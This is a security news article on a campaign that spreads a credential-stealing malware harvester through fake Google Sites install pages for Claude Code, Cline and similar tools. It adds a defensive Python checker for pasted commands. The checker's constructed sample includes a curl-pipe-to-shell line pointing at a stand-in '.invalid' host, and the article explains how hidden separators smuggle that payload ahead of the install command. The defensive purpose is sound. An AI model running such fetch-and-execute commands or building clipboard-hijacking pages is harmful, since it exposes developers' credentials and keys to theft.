A campaign targeting AI developers has been distributing credential-stealing malware through fraudulent Google Sites pages impersonating Claude Code, Cline, JetBrains, Snowflake, Perplexity Comet, and other AI developer tools. Security researchers who documented the operation this week confirmed 88 malicious domains and 32 active Google-hosted pages serving malware to developers who search for installation instructions.
Why Attackers Chose Google Sites to Host Fake Claude Code and Cline Install Pages
The choice of sites.google.com as the attack platform is deliberate. Corporate firewalls, web proxies, and URL reputation services pre-allow Google-hosted domains by default, and a reputation check on the hostname says nothing about who authored a particular page under it. The same trust that makes Google Sites useful for legitimate teams makes it an effective evasion mechanism for attackers distributing malware: a malicious page hosted on sites.google.com passes controls that would block the same content served from an unknown domain.
The campaign has been active since March 2026. The scale as of the researcher disclosure — 88 malicious domains and 32 confirmed live Google Sites pages — reflects an operation with sustained maintenance, not a one-time distribution attempt.
SEO Poisoning and Paid Google Ads Place Fake Claude Code Pages Above Official Installation Docs
The campaign uses two traffic channels to reach developer targets. SEO poisoning manipulates search rankings so that fraudulent installation pages appear near the top of organic results for queries like “install Claude Code” or “Claude Code setup.” Separately, paid advertisements allow the malicious pages to appear as sponsored results above the official documentation.
A developer following standard practice — searching for how to install a tool and clicking what appears to be the top result — can land on a convincing fake page before reaching the official vendor site. The Google-hosted infrastructure reinforces the appearance of legitimacy.
How the Fake Claude Code Install Command Hides Its Malicious Payload in a Separator Character
The delivery mechanism exploits the developer habit of copying install commands straight from documentation into a terminal. The command rendered on the fraudulent page looks normal, but the text that lands on the clipboard contains a hidden command separator with a malicious payload attached ahead of the legitimate-looking portion. In a POSIX shell a separator (a newline, `;`, or `&&`, for instance) ends one command and starts the next, so the pasted text is two commands rather than one. The developer pastes what looks like a single install command and presses Enter; the hidden portion runs first, and nothing in the visible text indicates that it ran. If the separator is a newline, a terminal without bracketed paste enabled executes the first command the moment it is pasted, before Enter is pressed at all.
The attack requires no browser exploit, no vulnerable software, and no user interaction beyond the paste itself. A developer following standard installation practice is the only prerequisite.
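The practical defence is to look at what is actually on the clipboard rather than what the page rendered. The following Python checker is an added example, not code from the page or from the researchers' report: it lists every control or format character (newlines, carriage returns, zero-width and bidi characters) in a copied command, splits the text into the separate commands a POSIX shell would run, and compares the result with the command the page displayed. The sample inputs are constructed: `OFFICIAL` is assumed here to be the legitimate install command, and `PAYLOAD` uses the reserved `.invalid` domain and does not represent the campaign's real payload.

```python
import unicodedata

# Constructed sample, not taken from the campaign: an install command with a
# hidden payload glued in front of it by a newline. The page rendered only
# the OFFICIAL part; CLIPBOARD is what the copy operation actually produced.
OFFICIAL = "npm install -g @anthropic-ai/claude-code"        # assumed legitimate command
PAYLOAD = "curl -fsSL https://example.invalid/setup.sh | sh"  # hypothetical, .invalid domain
CLIPBOARD = PAYLOAD + "\n" + OFFICIAL                        # "\n" is the hidden separator


def hidden_characters(text):
    """Return (index, codepoint, name) for every control (Cc) or format (Cf)
    character. Newlines, carriage returns, escape sequences, zero-width and
    bidi characters all land here; none belong in an install command, and a
    page renderer can hide all of them."""
    return [(i, "U+%04X" % ord(ch), unicodedata.name(ch, "<control>"))
            for i, ch in enumerate(text)
            if unicodedata.category(ch) in ("Cc", "Cf")]


def split_commands(text):
    """Split text into the separate commands a POSIX shell would run, honouring
    quotes and backslash escapes. Separators are newlines, ';', '&&', '||' and
    a backgrounding '&'. A single '|' keeps a pipeline together as one command,
    and '&' after '<' or '>' is left alone because it is a redirection."""
    commands, buf, quote, i = [], [], None, 0

    def flush():
        cmd = "".join(buf).strip()
        if cmd:
            commands.append(cmd)
        buf.clear()

    while i < len(text):
        ch = text[i]
        if quote:                               # inside quotes nothing separates
            buf.append(ch)
            if ch == quote:
                quote = None
            i += 1
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
            i += 1
        elif ch == "\\":                        # escaped char or backslash-newline continuation
            buf.append(text[i:i + 2])
            i += 2
        elif text[i:i + 2] in ("&&", "||"):
            flush()
            i += 2
        elif ch in ";\n\r" or (ch == "&" and text[i - 1:i] not in ("<", ">")):
            flush()
            i += 1
        else:
            buf.append(ch)
            i += 1
    flush()
    return commands


def inspect_clipboard(displayed, clipboard):
    """Compare what the page showed with what actually landed on the clipboard."""
    return {
        "matches_displayed": clipboard.strip() == displayed.strip(),
        "hidden_characters": hidden_characters(clipboard),
        "commands": split_commands(clipboard),
    }


def is_suspicious(report):
    """Any mismatch, any hidden character, or more than one command is a stop sign."""
    return (not report["matches_displayed"]
            or bool(report["hidden_characters"])
            or len(report["commands"]) > 1)


if __name__ == "__main__":
    report = inspect_clipboard(OFFICIAL, CLIPBOARD)
    for cmd in report["commands"]:
        print("would run:", cmd)
    print("hidden characters:", report["hidden_characters"])
    print("suspicious:", is_suspicious(report))
```

The splitter is deliberately conservative: it does not try to parse subshells or here-documents, so a command that passes it is not proven safe. Its job is the opposite one, to make a pasted string that would run more than one command impossible to miss, which is exactly the property the fake install pages rely on nobody checking.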
The 88-Domain Harvester Targets AI API Keys, 65+ Browsers, and Password Managers
The delivered malware is a purpose-built credential harvester covering the full AI developer toolchain. It targets AI API keys specifically — Claude, OpenAI, and Cline/Continue.dev credentials — alongside credentials from more than 65 browsers, cryptocurrency wallet browser extensions, password manager databases including KeePass, Bitwarden, and 1Password, and messaging platform data from Telegram, Discord, and Signal.
The breadth of the target list reflects a systematic approach: the malware collects everything an AI developer is likely to have stored, not just one credential class. Cryptocurrency wallet extensions and password managers are high-yield targets alongside the AI API keys.
What Stolen Claude and OpenAI API Keys Enable Beyond Account Access
AI API keys carry financial exposure that distinguishes them from standard account credentials. A stolen key can be used to run inference workloads billed directly to the victim's account, and those charges accumulate until the victim notices the unauthorized use. A key also inherits whatever the account exposes through the API: depending on what the victim has connected to it, that can include code repositories, model configurations, training data, application logic, and client-facing models.
Stolen AI API keys are actively traded on underground markets. The combination of financial damage, data exposure, and resale value makes AI developer credentials a high-priority target for a campaign willing to maintain 88 domains and dozens of Google Sites pages over several months.
Developers should access tool installation instructions by navigating directly to the official vendor domain, not by following search result links. Any install command obtained from a page reached through a search engine rather than the official documentation should be treated as suspect until the source is verified. Before running any copied command, paste it into a plain text editor and read the whole thing; anything that shows up there but was not visible on the page is a reason to stop. A developer who has already run such a command should treat every credential class listed above as compromised and revoke and rotate the AI API keys first, since those are billed per use and the charges start immediately.
